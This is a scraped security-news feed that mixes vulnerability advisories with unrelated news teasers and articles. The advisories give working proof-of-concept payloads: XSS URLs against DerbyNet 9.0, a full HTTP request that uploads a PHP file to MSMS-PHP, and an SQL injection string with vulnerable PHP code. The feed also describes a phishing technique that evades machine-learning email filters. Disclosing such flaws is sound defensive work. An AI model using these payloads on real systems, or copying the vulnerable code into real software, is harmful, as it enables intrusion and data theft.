DerbyNet version 9.0 suffers from a cross site scripting vulnerability in photo-thumbs.php.

CVE ID: CVE-2024-30925

Description:  
A Cross-Site Scripting (XSS) vulnerability exists in DerbyNet version 9.0, specifically within the `photo-thumbs.php` component. This issue enables a remote attacker to execute arbitrary code through the improper handling of the `racerid` and `back` parameters. The vulnerability arises because the application dynamically generates URLs for navigation without adequately sanitizing these parameters, thus allowing the injection of malicious scripts.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: photo-thumbs.php

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The XSS vulnerability can be exploited through manipulation of the `racerid` and `back` parameters in the URL. Examples of such manipulation include:  
- http://127.0.0.1:8000/photo-thumbs.php?repo=head&racerid=</script><script>alert(1)</script>  
- http://127.0.0.1:8000/photo-thumbs.php?back="><script>alert(1)</script></div>

These URLs demonstrate how an attacker could inject and execute arbitrary JavaScript within the context of the user's browser session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 photo-thumbs.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in render-document.php.

    CVE ID: CVE-2024-30920Description:A Cross Site Scripting (XSS) vulnerability has been identified in DerbyNet v9.0, specifically within the `render-document.php` component. This vulnerability allows a remote attacker to execute arbitrary code via crafted URLs. The root cause of the vulnerability is the application's failure to properly sanitize user input in document rendering paths, which permits the injection of malicious scripts.Vulnerability Type: XSS (Cross Site Scripting)Vendor of Product:DerbyNet - https://github.com/jeffpiazza/derbynetAffected Product Code Base:DerbyNet - v9.0Affected Component:render-document.phpAttack Type:RemoteImpact:Code executionRoot Cause:The vulnerability arises from the application's display of debug information, including `ORIG_SCRIPT_FILENAME`, `DOCUMENT_URI`, `SCRIPT_NAME`, and `PHP_SELF`. These debug outputs improperly handle user-supplied input by not sanitizing it before inclusion in the output, leading directly to XSS vulnerabilities when malicious inputs are rendered by the browser.Attack Vectors:The vulnerability can be exploited with URLs such as:- `http://127.0.0.1:8000/render-document.php/racer/<img src=x onerror=alert(1)>`- `http://127.0.0.1:8000/render-document.php/<img src=x onerror=alert(1)>`Discoverer:Valentin LobsteinReferences:- http://derbynet.com- https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 render-document.php Cross Site Scripting

As “P4x,” Alejandro Caceres single-handedly disrupted the internet of an entire country. Then he tried to show the US military how it can—and should—adopt his methods.

A Vigilante Hacker Took Down North Korea’s Internet. Now He’s Taking Off His Mask

It's critical for security teams to stay vigilant not only when it comes to major security issues, but also with minor lags in security best practice.

Tim Chase, Global Field CISO, Lacework

April 2, 2024

3 Min Read

Source: Anna Berkut via Alamy Stock Photo

COMMENTARY

The saying "put yourselves in the shoes of a hacker" has long been part of defensive security strategies. Today, in the fast-paced and evolving threat landscape, this statement is truer than ever for chief information security officers (CISOs) and security teams at scale.

As cyber threats continue to evolve in 2024, CISOs and security teams must be prepared for everything from supply chain risks to zero-day exploits to deepfakes to cloud targeting and more. By ensuring visibility across your infrastructure, encouraging employee training, and supporting bug bounty programs, your organization will harden its security posture and be better prepared to fend off rising threats this year. Let's dive a bit deeper into each: 

**Creating Security Allies Out of Your Team**

Recent cyberattacks have shown us that the level of sophistication and damage caused by malicious actors is not slowing down. The MOVEit data breach that leaked the personal information of more than 11 million people shows the raw scale of modern attacks. Similar breaches at MGM and Caesars were exacerbated by the FBI struggling to stop the cyber gang behind the incident. 

While the security team can't befriend everyone in an organization, they can focus on education internally in order to train staff on risks and create clear communication that covers important issues. If hackers are staying up to date and getting educated on the latest threats and risks, we should as well. Creating a "security champions" program across the organization is a great way to embed security. One team member from marketing, finance, legal, etc., can plug in to your team and be a liaison for security that helps push pertinent cybersecurity information out across the company.

**Supporting Bug Bounty Programs**

Rather than being anxious and shunning bug bounty programs, CISOs and security teams should reward good behavior. I encourage employees to attend hackathons — even if it's only to observe or learn at first. It's one step in the right direction for security education. For more hands-on cybersecurity learning, I also like to arrange company-wide competitions and games that encourage employees to figure out how cybercrime could potentially happen.

There is no better way to prepare for a real breach than with a simulation. It forces the team to work together, strategize, and agree on a solution. The increased need for internal cybersecurity education and support for bug bounty programs is only going to continue growing in order to keep up with rising threats.

**If All Else Fails, Focus on Visibility**

Visibility is a foundational principle that suggests you can't secure what you don't know about. Lack of a security team's visibility is a gold rush for hackers because they typically infiltrate an organization's network via hidden or sneaky entry points. If you don't have visibility, there will undoubtedly be a way in. Without visibility into all traffic within an organization's infrastructure, threat actors can continue to lurk in the network and grant themselves access to the organization's most sensitive data.

With 93% of malware hiding behind encrypted traffic but only 30% of security professionals claiming to have visibility, it's no wonder that there were more ransomware attacks in the first half of 2023 than in all of 2022. Once a cybercriminal has made their way into the network, time is limited. Only with visibility can the cybercriminal be stopped from wreaking havoc and gaining access to company data.

When cybersecurity professionals can better understand the mysterious nature of hackers and how they work, they can better protect their own systems and valuable customer data. It's critical to stay vigilant not only when it comes to major security issues, but also with minor lags in security best practice. We saw this with the recent breach of Hewlett Packard, which was undertaken by the same group behind 2020's SolarWinds breach. Some of the most sophisticated cybercriminals are also incredibly opportunistic, taking advantage of any split-second lapse in otherwise-tight security plans. Ensure you take the steps above to stay ahead of looming threats. 

**About the Author(s)**

Global Field CISO, Lacework

Tim Chase is the Global Field CISO at Lacework and has worked in information security for over 15 years in various roles, including leading security teams focusing on Cloud and AppSec. He has extensive experience working at the board and executive level to promote security and guide decision-making.

Instilling the Hacker Mindset Organizationwide

By Waqas
New AI-Dodging Phishing Attack AI Security and Exploits Machine Learning.
This is a post from HackRead.com Read the original post: Cybercriminals Beta Test New Attack to Bypass AI Security

Hackers develop a new attack (Conversation Overflow) to bypass AI security. Learn how this technique fools Machine Learning and what businesses can do to stay protected.

A recent discovery by SlashNext threat researchers reveals a dangerous cyberattack method termed “Conversation Overflow.” This technique involves cloaked emails designed to bypass machine learning (ML) security controls, allowing malicious payloads to infiltrate enterprise networks.

In a typical Conversation Overflow attack, cybercriminals employ cloaked emails designed to deceive ML tools into categorizing them as harmless. These emails contain two distinct sections: one visible to the recipient, prompting them to take action such as entering credentials or clicking links and another hidden portion filled with innocuous text.

Threat actors exploit ML algorithms by strategically inserting blank spaces to separate these sections, often focusing on deviations from “known good” communications rather than identifying malicious content.

According to SlashNext’s research shared with Hackread.com ahead of publication on Tuesday, this novel approach poses a significant challenge to traditional cybersecurity measures, which rely on databases of “known bad” signatures. Unlike these methods, ML systems analyze patterns to detect anomalies, making them susceptible to manipulation by attackers mimicking legitimate communication styles.

Once a Conversation Overflow attack breaches security defences, attackers can deliver seemingly genuine messages requesting credential reauthentication, particularly targeting high-level executives. The stolen credentials are then sold on dark web forums, highlighting the lucrative nature of such cybercrime.

SlashNext threat researchers express deep concern regarding the potential ramifications of this attack becoming widespread. There is a significant risk that cybercriminals are actively developing an entirely new toolkit, which could exacerbate the impact of such attacks, potentially leading to devastating consequences for organizations and individuals alike.

> _“This is not your same old credential harvesting attack, because it is smart enough to confuse certain sophisticated AI and ML engines. From these findings, we should conclude that cyber crooks are morphing their attack techniques in this dawning age of AI security. As a result, we are concerned that this development reveals an entirely new toolkit being refined by criminal hacker groups in real-time today.”_
> 
> SlashNext

The implications of this discovery are profound, signalling a shift in cybercriminal tactics to exploit vulnerabilities in AI and ML-driven security platforms. As cyber criminals adapt and refine their techniques, it becomes increasingly imperative for organizations to remain vigilant and proactive in fortifying their defences.

1.  Ivanti VPN Flaws Exploited to Spread KrustyLoader Malware
2.  Telekopye Toolkit Used as Telegram Bot to Scam Marketplace Users
3.  RIG Exploit Toolkit Spread CeidPageLock Malware to Hijack Browsers

Cybercriminals Beta Test New Attack to Bypass AI Security

By Deeba Ahmed
While Fujitsu did not disclose in-depth details, the company confirmed investigating a cyberattack that may have led to a data breach.
This is a post from HackRead.com Read the original post: Fujitsu Scrambles After Malware Attack: Customer Data Potentially Breached

Japanese tech giant Fujitsu is investigating a potential data leak after malware infected company systems – This could expose the personal information of customers and employees.

Fujitsu is investigating a possible data leak caused by a malware infection that may have allowed unauthorized access to personal information, according to its press release on Friday.

Fujitsu confirmed the presence of malware on multiple work computers, suggesting a potential entry point for unauthorized access. The company quickly launched an investigation. Initial probing has revealed that the malware could have accessed and extracted sensitive personal and customer information. 

“We discovered that files containing personal information and customer information could be illegally taken out,” Fujitsu stated in its press release.

However, the tech giant is yet to confirm the nature of malware used to target its computers, the number of affected computers, and the type of data breached in the attack. Fujitsu discovered the cyberattack on 15 March but has not disclosed other details, including whether contact details, passwords, and payment details were compromised and the time of the attack.

It has implemented strict security measures, isolating affected computers and strengthening network surveillance. The company has disconnected affected systems from its network and is investigating the type of malware used, the nature of the cyberattack, and the method of the intrusion. 

Fujitsu has not disclosed who has been affected, including employees, corporate customers, and citizens using the company’s technologies. 

The company claims to be informing “the targeted individuals and customers” about the possible data breach and has notified the Personal Information Protection Commission, Japan’s data protection authority.

“To date, we have not received any reports that personal information or information about our customers has been misused” the company concluded.

Fujitsu is a leading Japanese ICT company, employing 124,000 people in over 100 countries. The company has been involved in wrongful convictions due to bugs in its Horizon computer software.

1.  Top Japanese dating app Omiai hacked; 1.71 million users at risk
2.  CutOut.Pro AI Tool Data Breach: Hacker Leak 20 Million User Info
3.  Acer Data Breach: Hacker Claims to Sell 160GB Trove of Stolen Data
4.  American Express Users Impacted by 3rd-Party Vendor Data Breach
5.  Nissan Confirms Data Breach Affected 100,000 Users and Employees

Fujitsu Scrambles After Malware Attack: Customer Data Potentially Breached

### Summary
An attacker can exploit a critical flaw in the application to initiate a Denial of Service (DoS) attack, rendering the application inoperable and affecting all users. The issue arises from unsafe manipulation of an array in a multi-threaded environment.

### Details
The vulnerability is rooted in the application's code, where an array is being modified while it is being iterated over. This is a classic programming error but becomes critically unsafe when executed in a multi-threaded environment. When two threads interact with the same array simultaneously, the application crashes.

The core issue is located in [expireOldFailedAttempts](https://github.com/argoproj/argo-cd/blob/54601c8fd30b86a4c4b7eb449956264372c8bde0/util/session/sessionmanager.go#L302-L311) function:
```go
func expireOldFailedAttempts(maxAge time.Duration, failures *map[string]LoginAttempts) int {

expiredCount := 0  
for key, attempt := range *failures {

if time.Since(attempt.LastFailed) > maxAge*time.Second { expiredCount += 1  
delete(*failures, key) // Vulnerable code

} }

return expiredCount }
```

The function modifies the array while iterating it which means the code will cause an error and crash the application pod, inspecting the logs just before the crash we can confirm:
```go
goroutine 2032 [running]: github.com/argoproj/argo-cd/v2/util/session.expireOldFailedAttempts(0x12c, 0xc000adecd8)

/go/src/github.com/argoproj/argo-cd/util/session/sessionmanager.go:304 +0x7c github.com/argoproj/argo-cd/v2/util/session.(*SessionManager).updateFailureCount(0xc00035 af50, {0xc001b1f578, 0x11}, 0x1)

/go/src/github.com/argoproj/argo-cd/util/session/sessionmanager.go:320 +0x7f github.com/argoproj/argo-cd/v2/util/session.(*SessionManager).VerifyUsernamePassword(0xc 00035af50, {0xc001b1f578, 0x11}, {0xc000455148, 0x8})
```
### PoC
To reproduce the vulnerability, you can use the following steps:

1. Launch the application.
2. Trigger the code path that results in the `expireOldFailedAttempts()` function being called in multiple threads.
3. In the attached PoC script we are restarting the server in a while loop, causing the application to be unresponsive at all.

### Impact
This is a Denial of Service (DoS) vulnerability. Any attacker can crash the application continuously, making it impossible for legitimate users to access the service. The issue is exacerbated because it does not require authentication, widening the pool of potential attackers.

**Summary**

An attacker can exploit a critical flaw in the application to initiate a Denial of Service (DoS) attack, rendering the application inoperable and affecting all users. The issue arises from unsafe manipulation of an array in a multi-threaded environment.

**Details**

The vulnerability is rooted in the application's code, where an array is being modified while it is being iterated over. This is a classic programming error but becomes critically unsafe when executed in a multi-threaded environment. When two threads interact with the same array simultaneously, the application crashes.

The core issue is located in expireOldFailedAttempts function:

func expireOldFailedAttempts(maxAge time.Duration, failures \*map\[string\]LoginAttempts) int {

expiredCount := 0  
for key, attempt := range \*failures {

if time.Since(attempt.LastFailed) \> maxAge\*time.Second { expiredCount += 1  
delete(\*failures, key) // Vulnerable code

} }

return expiredCount }

The function modifies the array while iterating it which means the code will cause an error and crash the application pod, inspecting the logs just before the crash we can confirm:

goroutine 2032 \[running\]: github.com/argoproj/argo\-cd/v2/util/session.expireOldFailedAttempts(0x12c, 0xc000adecd8)

/go/src/github.com/argoproj/argo\-cd/util/session/sessionmanager.go:304 +0x7c github.com/argoproj/argo\-cd/v2/util/session.(\*SessionManager).updateFailureCount(0xc00035 af50, {0xc001b1f578, 0x11}, 0x1)

/go/src/github.com/argoproj/argo\-cd/util/session/sessionmanager.go:320 +0x7f github.com/argoproj/argo\-cd/v2/util/session.(\*SessionManager).VerifyUsernamePassword(0xc 00035af50, {0xc001b1f578, 0x11}, {0xc000455148, 0x8})

**PoC**

To reproduce the vulnerability, you can use the following steps:

1.  Launch the application.
2.  Trigger the code path that results in the expireOldFailedAttempts() function being called in multiple threads.
3.  In the attached PoC script we are restarting the server in a while loop, causing the application to be unresponsive at all.

**Impact**

This is a Denial of Service (DoS) vulnerability. Any attacker can crash the application continuously, making it impossible for legitimate users to access the service. The issue is exacerbated because it does not require authentication, widening the pool of potential attackers.

**References**

*   GHSA-6v85-wr92-q4p7
*   https://nvd.nist.gov/vuln/detail/CVE-2024-21661
*   argoproj/argo-cd@2a22e19
*   argoproj/argo-cd@5bbb51a
*   argoproj/argo-cd@ce04dc5
*   https://github.com/argoproj/argo-cd/blob/54601c8fd30b86a4c4b7eb449956264372c8bde0/util/session/sessionmanager.go#L302-L311

GHSA-6v85-wr92-q4p7: Denial of Service (DoS) Vulnerability Due to Unsafe Array Modification in Multi-threaded Environment

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

A global network of violent predators is hiding in plain sight, targeting children on major platforms, grooming them, and extorting them to commit horrific acts of abuse.

There Are Dark Corners of the Internet. Then There's 764

Membership Management System version 1.0 suffers from a remote SQL injection vulnerability.

    - Title: Membership Management System - SQL injection- Application: Hospital Management System- Date: 01.03.2024- Bugs: SQL injection- Exploit Author: SoSPiro- Vendor Homepage: https://codeastro.com/author/nbadmin/- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/- Version: 1.0- Tested on: Windows 10 64 bit Wampserver### Vulnerability Description:The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.### SQL Injection:This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.### Proof of Concept (PoC):Below is an example payload illustrating the SQL injection vulnerability:```email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=```In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.- Request Response[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)### Vulnerable Code Section:```php$email = $_POST['email'];$password = $_POST['password'];$hashed_password = md5($password);$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";```The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection

Tag

#acer